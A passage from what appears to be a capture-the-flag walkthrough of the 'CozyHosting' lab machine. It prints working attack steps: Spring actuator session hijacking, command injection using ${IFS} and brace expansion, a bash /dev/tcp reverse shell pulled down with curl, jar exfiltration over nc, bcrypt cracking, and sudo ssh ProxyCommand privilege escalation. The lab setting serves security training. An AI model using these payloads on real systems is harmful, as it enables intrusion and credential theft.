500 GET 1l 1w 73c http://cozyhosting.htb/error
200 GET 285l 745w 12706c http://cozyhosting.htb/index
400 GET 1l 32w 435c http://cozyhosting.htb/[
400 GET 1l 32w 435c http://cozyhosting.htb/plain]
400 GET 1l 32w 435c http://cozyhosting.htb/]
400 GET 1l 32w 435c http://cozyhosting.htb/quote]
400 GET 1l 32w 435c http://cozyhosting.htb/extension]
400 GET 1l 32w 435c http://cozyhosting.htb/[0-9]
[####################] - 2m 30000/30000 0s found:12 errors:0
[####################] - 2m 30000/30000 226/s http://cozyhosting.htb/
There’s a /admin
page that requires auth.
/error
shows a similar error to the 404 error:
SecLists has a specific wordlist for Springboot. I’ll run feroxbuster
again with this list:
oxdf@hacky$ feroxbuster -u http://cozyhosting.htb -w /opt/SecLists/Discovery/Web-Content/spring-boot.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.9.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://cozyhosting.htb
🚀 Threads │ 50
📖 Wordlist │ /opt/SecLists/Discovery/Web-Content/spring-boot.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.9.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 1l 2w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 0l 0w 0c http://cozyhosting.htb/actuator/env/tz
404 GET 0l 0w 0c http://cozyhosting.htb/actuator/env/language
404 GET 0l 0w 0c http://cozyhosting.htb/actuator/env/pwd
404 GET 0l 0w 0c http://cozyhosting.htb/actuator/env/hostname
200 GET 285l 745w 12706c http://cozyhosting.htb/
200 GET 1l 1w 634c http://cozyhosting.htb/actuator
200 GET 1l 1w 95c http://cozyhosting.htb/actuator/sessions
200 GET 1l 13w 487c http://cozyhosting.htb/actuator/env/path
200 GET 1l 13w 487c http://cozyhosting.htb/actuator/env/lang
200 GET 1l 13w 487c http://cozyhosting.htb/actuator/env/home
404 GET 0l 0w 0c http://cozyhosting.htb/actuator/env/spring.jmx.enabled
200 GET 1l 120w 4957c http://cozyhosting.htb/actuator/env
200 GET 1l 1w 15c http://cozyhosting.htb/actuator/health
200 GET 1l 108w 9938c http://cozyhosting.htb/actuator/mappings
200 GET 1l 542w 127224c http://cozyhosting.htb/actuator/beans
[####################] - 2s 113/113 0s found:13 errors:0
[####################] - 1s 113/113 81/s http://cozyhosting.htb/
The /actuator
path is interesting, and everything else is a part of that.
Spring Boot includes a set of features that are designed for monitoring, managing, and debugging applications known as actuators. /actuator/mapping
gives a detailed list about the application, including not only the actuators, but also other endpoints for the application:
oxdf@hacky$ curl -s http://cozyhosting.htb/actuator/mappings | jq .
{
"contexts": {
"application": {
"mappings": {
"dispatcherServlets": {
"dispatcherServlet": [
{
"handler": "Actuator web endpoint 'beans'",
"predicate": "{GET [/actuator/beans], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}",
"details": {
"handlerMethod": {
"className": "org.springframework.boot.actuate.endpoint.web.servlet.AbstractWebMvcEndpointHandlerMapping.OperationHandler",
"name": "handle",
"descriptor": "(Ljakarta/servlet/http/HttpServletRequest;Ljava/util/Map;)Ljava/lang/Object;"
},
"requestMappingConditions": {
"consumes": [],
"headers": [],
"methods": [
"GET"
],
"params": [],
"patterns": [
"/actuator/beans"
],
"produces": [
{
"mediaType": "application/vnd.spring-boot.actuator.v3+json",
"negated": false
},
{
"mediaType": "application/vnd.spring-boot.actuator.v2+json",
"negated": false
},
{
"mediaType": "application/json",
"negated": false
}
]
}
}
},
{
"handler": "Actuator web endpoint 'health-path'",
"predicate": "{GET [/actuator/health/**], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}",
"details": {
"handlerMethod": {
"className": "org.springframework.boot.actuate.endpoint.web.servlet.AbstractWebMvcEndpointHandlerMapping.OperationHandler",
"name": "handle",
"descriptor": "(Ljakarta/servlet/http/HttpServletRequest;Ljava/util/Map;)Ljava/lang/Object;"
},
"requestMappingConditions": {
"consumes": [],
"headers": [],
"methods": [
"GET"
],
"params": [],
"patterns": [
"/actuator/health/**"
],
"produces": [
{
"mediaType": "application/vnd.spring-boot.actuator.v3+json",
"negated": false
},
{
"mediaType": "application/vnd.spring-boot.actuator.v2+json",
"negated": false
},
{
"mediaType": "application/json",
"negated": false
}
]
}
}
},
{
"handler": "Actuator web endpoint 'mappings'",
"predicate": "{GET [/actuator/mappings], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}",
"details": {
"handlerMethod": {
"className": "org.springframework.boot.actuate.endpoint.web.servlet.AbstractWebMvcEndpointHandlerMapping.OperationHandler",
"name": "handle",
"descriptor": "(Ljakarta/servlet/http/HttpServletRequest;Ljava/util/Map;)Ljava/lang/Object;"
},
"requestMappingConditions": {
"consumes": [],
"headers": [],
"methods": [
"GET"
],
"params": [],
"patterns": [
"/actuator/mappings"
],
"produces": [
{
"mediaType": "application/vnd.spring-boot.actuator.v3+json",
"negated": false
},
{
"mediaType": "application/vnd.spring-boot.actuator.v2+json",
"negated": false
},
{
"mediaType": "application/json",
"negated": false
}
]
}
}
},
{
"handler": "Actuator root web endpoint",
"predicate": "{GET [/actuator], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}",
"details": {
"handlerMethod": {
"className": "org.springframework.boot.actuate.endpoint.web.servlet.WebMvcEndpointHandlerMapping.WebMvcLinksHandler",
"name": "links",
"descriptor": "(Ljakarta/servlet/http/HttpServletRequest;Ljakarta/servlet/http/HttpServletResponse;)Ljava/util/Map;"
},
"requestMappingConditions": {
"consumes": [],
"headers": [],
"methods": [
"GET"
],
"params": [],
"patterns": [
"/actuator"
],
"produces": [
{
"mediaType": "application/vnd.spring-boot.actuator.v3+json",
"negated": false
},
{
"mediaType": "application/vnd.spring-boot.actuator.v2+json",
"negated": false
},
{
"mediaType": "application/json",
"negated": false
}
]
}
}
},
{
"handler": "Actuator web endpoint 'env'",
"predicate": "{GET [/actuator/env], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}",
"details": {
"handlerMethod": {
"className": "org.springframework.boot.actuate.endpoint.web.servlet.AbstractWebMvcEndpointHandlerMapping.OperationHandler",
"name": "handle",
"descriptor": "(Ljakarta/servlet/http/HttpServletRequest;Ljava/util/Map;)Ljava/lang/Object;"
},
"requestMappingConditions": {
"consumes": [],
"headers": [],
"methods": [
"GET"
],
"params": [],
"patterns": [
"/actuator/env"
],
"produces": [
{
"mediaType": "application/vnd.spring-boot.actuator.v3+json",
"negated": false
},
{
"mediaType": "application/vnd.spring-boot.actuator.v2+json",
"negated": false
},
{
"mediaType": "application/json",
"negated": false
}
]
}
}
},
{
"handler": "Actuator web endpoint 'env-toMatch'",
"predicate": "{GET [/actuator/env/{toMatch}], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}",
"details": {
"handlerMethod": {
"className": "org.springframework.boot.actuate.endpoint.web.servlet.AbstractWebMvcEndpointHandlerMapping.OperationHandler",
"name": "handle",
"descriptor": "(Ljakarta/servlet/http/HttpServletRequest;Ljava/util/Map;)Ljava/lang/Object;"
},
"requestMappingConditions": {
"consumes": [],
"headers": [],
"methods": [
"GET"
],
"params": [],
"patterns": [
"/actuator/env/{toMatch}"
],
"produces": [
{
"mediaType": "application/vnd.spring-boot.actuator.v3+json",
"negated": false
},
{
"mediaType": "application/vnd.spring-boot.actuator.v2+json",
"negated": false
},
{
"mediaType": "application/json",
"negated": false
}
]
}
}
},
{
"handler": "Actuator web endpoint 'sessions'",
"predicate": "{GET [/actuator/sessions], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}",
"details": {
"handlerMethod": {
"className": "org.springframework.boot.actuate.endpoint.web.servlet.AbstractWebMvcEndpointHandlerMapping.OperationHandler",
"name": "handle",
"descriptor": "(Ljakarta/servlet/http/HttpServletRequest;Ljava/util/Map;)Ljava/lang/Object;"
},
"requestMappingConditions": {
"consumes": [],
"headers": [],
"methods": [
"GET"
],
"params": [],
"patterns": [
"/actuator/sessions"
],
"produces": [
{
"mediaType": "application/vnd.spring-boot.actuator.v3+json",
"negated": false
},
{
"mediaType": "application/vnd.spring-boot.actuator.v2+json",
"negated": false
},
{
"mediaType": "application/json",
"negated": false
}
]
}
}
},
{
"handler": "Actuator web endpoint 'health'",
"predicate": "{GET [/actuator/health], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}",
"details": {
"handlerMethod": {
"className": "org.springframework.boot.actuate.endpoint.web.servlet.AbstractWebMvcEndpointHandlerMapping.OperationHandler",
"name": "handle",
"descriptor": "(Ljakarta/servlet/http/HttpServletRequest;Ljava/util/Map;)Ljava/lang/Object;"
},
"requestMappingConditions": {
"consumes": [],
"headers": [],
"methods": [
"GET"
],
"params": [],
"patterns": [
"/actuator/health"
],
"produces": [
{
"mediaType": "application/vnd.spring-boot.actuator.v3+json",
"negated": false
},
{
"mediaType": "application/vnd.spring-boot.actuator.v2+json",
"negated": false
},
{
"mediaType": "application/json",
"negated": false
}
]
}
}
},
{
"handler": "org.springframework.boot.autoconfigure.web.servlet.error.BasicErrorController#errorHtml(HttpServletRequest, HttpServletResponse)",
"predicate": "{ [/error], produces [text/html]}",
"details": {
"handlerMethod": {
"className": "org.springframework.boot.autoconfigure.web.servlet.error.BasicErrorController",
"name": "errorHtml",
"descriptor": "(Ljakarta/servlet/http/HttpServletRequest;Ljakarta/servlet/http/HttpServletResponse;)Lorg/springframework/web/servlet/ModelAndView;"
},
"requestMappingConditions": {
"consumes": [],
"headers": [],
"methods": [],
"params": [],
"patterns": [
"/error"
],
"produces": [
{
"mediaType": "text/html",
"negated": false
}
]
}
}
},
{
"handler": "htb.cloudhosting.compliance.ComplianceService#executeOverSsh(String, String, HttpServletResponse)",
"predicate": "{POST [/executessh]}",
"details": {
"handlerMethod": {
"className": "htb.cloudhosting.compliance.ComplianceService",
"name": "executeOverSsh",
"descriptor": "(Ljava/lang/String;Ljava/lang/String;Ljakarta/servlet/http/HttpServletResponse;)V"
},
"requestMappingConditions": {
"consumes": [],
"headers": [],
"methods": [
"POST"
],
"params": [],
"patterns": [
"/executessh"
],
"produces": []
}
}
},
{
"handler": "org.springframework.boot.autoconfigure.web.servlet.error.BasicErrorController#error(HttpServletRequest)",
"predicate": "{ [/error]}",
"details": {
"handlerMethod": {
"className": "org.springframework.boot.autoconfigure.web.servlet.error.BasicErrorController",
"name": "error",
"descriptor": "(Ljakarta/servlet/http/HttpServletRequest;)Lorg/springframework/http/ResponseEntity;"
},
"requestMappingConditions": {
"consumes": [],
"headers": [],
"methods": [],
"params": [],
"patterns": [
"/error"
],
"produces": []
}
}
},
{
"handler": "ParameterizableViewController [view=\"admin\"]",
"predicate": "/admin"
},
{
"handler": "ParameterizableViewController [view=\"addhost\"]",
"predicate": "/addhost"
},
{
"handler": "ParameterizableViewController [view=\"index\"]",
"predicate": "/index"
},
{
"handler": "ParameterizableViewController [view=\"login\"]",
"predicate": "/login"
},
{
"handler": "ResourceHttpRequestHandler [classpath [META-INF/resources/webjars/]]",
"predicate": "/webjars/**"
},
{
"handler": "ResourceHttpRequestHandler [classpath [META-INF/resources/], classpath [resources/], classpath [static/], classpath [public/], ServletContext [/]]",
"predicate": "/**"
}
]
},
"servletFilters": [
{
"servletNameMappings": [],
"urlPatternMappings": [
"/*"
],
"name": "requestContextFilter",
"className": "org.springframework.boot.web.servlet.filter.OrderedRequestContextFilter"
},
{
"servletNameMappings": [],
"urlPatternMappings": [
"/*"
],
"name": "Tomcat WebSocket (JSR356) Filter",
"className": "org.apache.tomcat.websocket.server.WsFilter"
},
{
"servletNameMappings": [],
"urlPatternMappings": [
"/*"
],
"name": "serverHttpObservationFilter",
"className": "org.springframework.web.filter.ServerHttpObservationFilter"
},
{
"servletNameMappings": [],
"urlPatternMappings": [
"/*"
],
"name": "characterEncodingFilter",
"className": "org.springframework.boot.web.servlet.filter.OrderedCharacterEncodingFilter"
},
{
"servletNameMappings": [],
"urlPatternMappings": [
"/*"
],
"name": "springSecurityFilterChain",
"className": "org.springframework.boot.web.servlet.DelegatingFilterProxyRegistrationBean$1"
},
{
"servletNameMappings": [],
"urlPatternMappings": [
"/*"
],
"name": "formContentFilter",
"className": "org.springframework.boot.web.servlet.filter.OrderedFormContentFilter"
}
],
"servlets": [
{
"mappings": [
"/"
],
"name": "dispatcherServlet",
"className": "org.springframework.web.servlet.DispatcherServlet"
}
]
}
}
}
}
That’s a ton of data, but with some jq
foo I can get a nice list:
oxdf@hacky$ curl -s http://cozyhosting.htb/actuator/mappings | jq -c '.contexts.application.mappings.dispatcherServlets
.dispatcherServlet | .[] | [.handler, .predicate]'
["Actuator web endpoint 'beans'","{GET [/actuator/beans], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}"]
["Actuator web endpoint 'health-path'","{GET [/actuator/health/**], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}"]
["Actuator web endpoint 'mappings'","{GET [/actuator/mappings], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}"]
["Actuator root web endpoint","{GET [/actuator], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}"]
["Actuator web endpoint 'env'","{GET [/actuator/env], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}"]
["Actuator web endpoint 'env-toMatch'","{GET [/actuator/env/{toMatch}], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}"]
["Actuator web endpoint 'sessions'","{GET [/actuator/sessions], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}"]
["Actuator web endpoint 'health'","{GET [/actuator/health], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}"]
["org.springframework.boot.autoconfigure.web.servlet.error.BasicErrorController#errorHtml(HttpServletRequest, HttpServletResponse)","{ [/error], produces [text/html]}"]
["htb.cloudhosting.compliance.ComplianceService#executeOverSsh(String, String, HttpServletResponse)","{POST [/executessh]}"]
["org.springframework.boot.autoconfigure.web.servlet.error.BasicErrorController#error(HttpServletRequest)","{ [/error]}"]
["ParameterizableViewController [view=\"admin\"]","/admin"]
["ParameterizableViewController [view=\"addhost\"]","/addhost"]
["ParameterizableViewController [view=\"index\"]","/index"]
["ParameterizableViewController [view=\"login\"]","/login"]
["ResourceHttpRequestHandler [classpath [META-INF/resources/webjars/]]","/webjars/**"]
["ResourceHttpRequestHandler [classpath [META-INF/resources/], classpath [resources/], classpath [static/], classpath [public/], ServletContext [/]]","/**"]
/addhost
and /executessh
, but I’ll come back to those.
/actuator/env
lead what looks like some configuration values, but a lot of the interesitng ones (and some not interesting ones) are masked, shown as strings of “*”.
/actuator/sessions
is immediately interesting:
oxdf@hacky$ curl -s http://cozyhosting.htb/actuator/sessions | jq .
{
"1AB37C626597DADB7425C1273F7DA678": "kanderson"
}
If try and fail to log in a few times, more sessions show up:
oxdf@hacky$ curl -s http://cozyhosting.htb/actuator/sessions | jq .
{
"EEE571008BF31ADB2E904F4E8CBF5ABB": "UNAUTHORIZED",
"E1CE43B04CC6C958A7496877E331256D": "UNAUTHORIZED",
"2926B07C6C6B8CB0B92A5AE5DF5AE2B6": "UNAUTHORIZED",
"B3C02C5C13A99CCEFC3AF469D28374C9": "UNAUTHORIZED",
"C987ACE5C53875AE151372328A544FAF": "kanderson"
}
I’ll go into Firefox dev tools, under Storage -> Cookies and replace the value for JSESSIONID
with the kandersons user’s cookie.
Now when I refresh /login
or visit /admin
, there’s a panel and I’m authenticated as K. Anderson:
The interesting part of the page is the form at the bottom. If I submit my IP as the hostname and 0xdf as the username, it returns an error after short wait:
This is a POST request to /executessh
(noticed above).
POST /executessh HTTP/1.1
Host: cozyhosting.htb
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://cozyhosting.htb
Connection: close
Referer: http://cozyhosting.htb/admin?error=ssh:%20connect%20to%20host%2010.10.14.6%20port%2022:%20Connection%20timed%20out
Cookie: JSESSIONID=C987ACE5C53875AE151372328A544FAF
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
host=10.10.14.6&username=0xdf
I’ll try that again with Wireshark running, but there’s no connection to my host. There must be a firewall blocking outbound connections.
I’ll try having it target localhost
. It’s a different error:
Based on the error message, and that it said it’s using a private key, it seems likely that the server is running ssh -i [key] [username]@[hostname]
to connect. If that’s the case, I can test for command injection vulnerabilities. My first attempt returns “Invalid hostname!”:
This indicates that there’s some kind of filtering going on. I’ll try &
and |
instead of ;
, but the same result. Before fuzzing to see what are the banned characters, I’ll try in the username field. It’s a different error message:
There are a couple ways to get whitespace without spaces in a Linux terminal context. I’ll use ${IFS}
as a Bash environment variable that is a space, and it kind of works:
It’s making the command:
ssh -i [key] 0xdf;ping${IFS}-c${IFS}1${IFS}10.10.14.6@localhost
It’s interesting that it handles 0xdf as 0.0.0.223
, but not important. It’s failing SSH, and then trying to ping 10.10.14.6@localhost
. So my command is a bit broken, but it’s working. I’ll add a comment #
to the end:
It shows failure, but at my box with tcpdump
, I see a ICMP packet:
oxdf@hacky$ sudo tcpdump -ni tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
10:57:55.045594 IP 10.10.11.230 > 10.10.14.6: ICMP echo request, id 5, seq 1, length 64
10:57:55.045627 IP 10.10.14.6 > 10.10.11.230: ICMP echo reply, id 5, seq 1, length 64
That’s command injection!
Alternatively, I can also get spaces added in Bash with brace expansion, so the username 0xdf;{ping,-c,1,10.10.14.6};#
works as well, making:
ssh -i [key] 0xdf;{ping,-c,1,10.10.14.6};#@localhost
Which expands to:
ssh -i [key] 0xdf;ping -c 1 10.10.14.6;#@localhost
Java applications can be very tricky about piping and special characters in processes, so I’ll go the simple route of writing a Bash script to disk and then running it. I’ll create a reverse shell script locally called rev.sh
:
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.6/443 0>&1
I’ll switch my requests over to Burp Repeater for quicker sending. I’ll use curl
to fetch rev.sh
from my server:
It works:
oxdf@hacky$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.230 - - [27/Feb/2024 11:05:08] "GET /rev.sh HTTP/1.1" 200 -
But there’s an error in the response:
If I move to /tmp/rev.sh
, it seems to work:
I’ll submit another request to run bash /tmp/rev.sh
:
The request just hangs, but at my listening nc
, there’s a shell:
oxdf@hacky$ nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.230 51348
bash: cannot set terminal process group (1063): Inappropriate ioctl for device
bash: no job control in this shell
app@cozyhosting:/app$
I’ll upgrade my shell using the script technique:
app@cozyhosting:/app$ script /dev/null -c bash
script /dev/null -c bash
Script started, output log file is '/dev/null'.
app@cozyhosting:/app$ ^Z
[1]+ Stopped nc -lnvp 443
oxdf@hacky$ stty raw -echo; fg
nc -lnvp 443
reset
reset: unknown terminal type unknown
Terminal type? screen
app@cozyhosting:/app$
The web application is running out of /app
, which container a Java Jar file:
app@cozyhosting:/app$ ls
cloudhosting-0.0.1.jar
That Jar is running:
app@cozyhosting:/app$ ps auxww | grep cloudhosting
app 1063 0.7 14.9 3672520 599428 ? Ssl Feb26 7:37 /usr/bin/java -jar cloudhosting-0.0.1.jar
That process is listening on 8080:
app@cozyhosting:/app$ netstat -tnlp | grep 1063
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
tcp6 0 0 127.0.0.1:8080 :::* LISTEN 1063/java
And I can see that nginx is forwarding traffic for cozyhosting.htb
to port 8080:
app@cozyhosting:/app$ cat /etc/nginx/sites-enabled/default
server {
listen 80;
return 301 http://cozyhosting.htb;
}
server {
listen 80;
server_name cozyhosting.htb;
location / {
proxy_pass http://localhost:8080;
}
}
There is one user with a home directory, but app cannot access it:
app@cozyhosting:/home$ ls
josh
app@cozyhosting:/home$ cd josh/
bash: cd: josh/: Permission denied
There’s not much else interesting that app can access.
I’m going to take a look at the web application, and there are a couple of approaches that both get to the same information I need to move forward:
flowchart TD;
A[cloudhosting-0.0.1.jar]-->B(Unzip on CozyHosting);
A-->C(Exfil and jd-gui);
B-->D[Find DB Credentials];
C-->D;
linkStyle default stroke-width:2px,stroke:#FFFF99,fill:none;
Jar files are Java Archive files. They contain all the files needed to run the Java application (in this case a web server), and are actually just Zip file. The quick and dirty way to take a copy of it and just unzip it to take an initial look:
app@cozyhosting:/app$ cp cloudhosting-0.0.1.jar /dev/shm/
app@cozyhosting:/app$ cd /dev/shm/
app@cozyhosting:/dev/shm$ unzip cloudhosting-0.0.1.jar
Archive: cloudhosting-0.0.1.jar
creating: META-INF/
inflating: META-INF/MANIFEST.MF
creating: org/
...[snip]...
The entry point for the application is defined in the MANIFEST.MF
file as htb.cloudhosting.CozyHostingApp
:
app@cozyhosting:/dev/shm$ cat META-INF/MANIFEST.MF
Manifest-Version: 1.0
Created-By: Maven JAR Plugin 3.3.0
Build-Jdk-Spec: 17
Implementation-Title: cloudhosting
Implementation-Version: 0.0.1
Main-Class: org.springframework.boot.loader.JarLauncher
Start-Class: htb.cloudhosting.CozyHostingApp
Spring-Boot-Version: 3.0.2
Spring-Boot-Classes: BOOT-INF/classes/
Spring-Boot-Lib: BOOT-INF/lib/
Spring-Boot-Classpath-Index: BOOT-INF/classpath.idx
Spring-Boot-Layers-Index: BOOT-INF/layers.idx
But I’ll save the code analysis for a nicer application. Having all these files allows me to do things like looks for passwords:
app@cozyhosting:/dev/shm$ grep -r password . 2>/dev/null
./BOOT-INF/classes/application.properties:spring.datasource.password=Vg&nvzAQ7XxR
./BOOT-INF/classes/templates/login.html: <input type="password" name="password" class="form-control" id="yourPassword"
./BOOT-INF/classes/templates/login.html: <div class="invalid-feedback">Please enter your password!</div>
./BOOT-INF/classes/templates/login.html: <p th:if="${param.error}" class="text-center small">Invalid username or password</p>
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.symbol.svg:</symbol><symbol viewBox="0 0 24 24" id="ri-lock-password-fill">
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.symbol.svg:</symbol><symbol viewBox="0 0 24 24" id="ri-lock-password-line">
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.svg: <glyph glyph-name="lock-password-fill"
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.svg: <glyph glyph-name="lock-password-line"
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.less:.ri-lock-password-fill:before { content: "\eecf"; }
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.less:.ri-lock-password-line:before { content: "\eed0"; }
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.css:.ri-lock-password-fill:before { content: "\eecf"; }
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.css:.ri-lock-password-line:before { content: "\eed0"; }
The first line has a datasource
password, which looks interesting. I’ll inspect that file:
app@cozyhosting:/dev/shm$ cat BOOT-INF/classes/application.properties
server.address=127.0.0.1
server.servlet.session.timeout=5m
management.endpoints.web.exposure.include=health,beans,env,sessions,mappings
management.endpoint.sessions.enabled = true
spring.datasource.driver-class-name=org.postgresql.Driver
spring.jpa.database-platform=org.hibernate.dialect.PostgreSQLDialect
spring.jpa.hibernate.ddl-auto=none
spring.jpa.database=POSTGRESQL
spring.datasource.platform=postgres
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
It’s the database connection information.
I’ll start nc
listening forwarding any output to cloudhosting-0.0.1.jar
on my host:
oxdf@hacky$ nc -lnvp 443 > cloudhosting-0.0.1.jar
Listening on 0.0.0.0 443
On CozyHosting, I’ll send the Jar into nc
back to my host:
app@cozyhosting:/dev/shm$ cat cloudhosting-0.0.1.jar | nc 10.10.14.6 443
This hangs, but on my host it shows a connection:
oxdf@hacky$ nc -lnvp 443 > cloudhosting-0.0.1.jar
Listening on 0.0.0.0 443
Connection received on 10.10.11.230 48534
After a few seconds, I’ll kill it on my side, and make sure the md5sum
of the two files matches.
I’ll I’ll download the jd-gui Jar file and run it with java -jar jd-gui-1.6.6.jar
, opening the Jar file. The htb.cloudhosting.CozyHostingApp
class just starts the Spring Boot application:
The application.properties
file is right there as well, with the DB info:
I’ll connect to Postgres using the psql
utility installed on CozyHosting:
app@cozyhosting:/$ PGPASSWORD='Vg&nvzAQ7XxR' psql -U postgres -h localhost
psql (14.9 (Ubuntu 14.9-0ubuntu0.22.04.1))
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
Type "help" for help.
postgres=#
There is really one interesting database:
postgres=# \list
List of databases
Name | Owner | Encoding | Collate | Ctype | Access privileges
-------------+----------+----------+-------------+-------------+-----------------------
cozyhosting | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 |
postgres | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 |
template0 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | =c/postgres +
| | | | | postgres=CTc/postgres
template1 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | =c/postgres +
| | | | | postgres=CTc/postgres
(4 rows)
It has two tables, hosts
and users
:
cozyhosting=# \dt
List of relations
Schema | Name | Type | Owner
--------+-------+-------+----------
public | hosts | table | postgres
public | users | table | postgres
(2 rows)
The hosts
table isn’t interesting, but the users
table has hashes in it:
cozyhosting=# select * from users;
name | password | role
-----------+--------------------------------------------------------------+-------
kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User
admin | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admin
(2 rows)
I’ll make a hashes
file with those two hashes:
$ cat hashes
kanderson:$2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim
admin:$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm
hashcat
isn’t able to automatically detect the hash type:
$ hashcat hashes --user /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
hashcat (v6.2.6) starting
...[snip]...
The following 4 hash-modes match the structure of your input hash:
# | Name | Category
======+============================================================+======================================
3200 | bcrypt $2*$, Blowfish (Unix) | Operating System
25600 | bcrypt(md5($pass)) / bcryptmd5 | Forums, CMS, E-Commerce
25800 | bcrypt(sha1($pass)) / bcryptsha1 | Forums, CMS, E-Commerce
28400 | bcrypt(sha512($pass)) / bcryptsha512 | Forums, CMS, E-Commerce
Please specify the hash-mode with -m [hash-mode].
...[snip]...
I’m including --user
because my hashes have [username]:
at the front of each line.
3200 is the most generic type, so I’ll start with that:
$ hashcat hashes --user -m 3200 /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
hashcat (v6.2.6) starting
...[snip]...
$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm:manchesterunited
...[snip]...
admin’s password is “manchesterunited”.
The other user on the box is josh, and that password works with su
:
app@cozyhosting:/$ su - josh
Password:
josh@cozyhosting:~$
Or I can get a clean shell with SSH:
oxdf@hacky$ sshpass -p manchesterunited ssh josh@cozyhosting.htb
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-82-generic x86_64)
...[snip]..
josh@cozyhosting:~$
Either way, I can grab user.txt
:
josh@cozyhosting:~$ cat user.txt
30628c91************************
The josh user can run ssh
as root using sudo
:
josh@cozyhosting:~$ sudo -l
[sudo] password for josh:
Matching Defaults entries for josh on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User josh may run the following commands on localhost:
(root) /usr/bin/ssh *
There’s a GTFObins page for ssh
, but it’s more fun to look at the man page. SSH has an option called ProxyCommand
. I actually use this in real life to connect to SSH servers through a socks proxy. I have an SSH config file that looks like this:
When I run ssh [hostname]
, it runs nc
connecting to localhost:1080
as a SOCKS5 (-X 5
) proxy, and then my SSH connection can travel over that proxy.
The ProxyCommand
is run on the client before making the connection, so I can abuse that to do arbitrary things as the user who is running the ssh
command. In this case, that’s root because of sudo
. I’ll show touching a file:
josh@cozyhosting:~$ sudo ssh -o ProxyCommand='touch /tmp/0xdf' x
kex_exchange_identification: Connection closed by remote host
Connection closed by UNKNOWN port 65535
josh@cozyhosting:~$ ls -l /tmp/0xdf
-rw-r--r-- 1 root root 0 Feb 27 18:19 /tmp/0xdf
It works. I can use this to make a SetUID bash
:
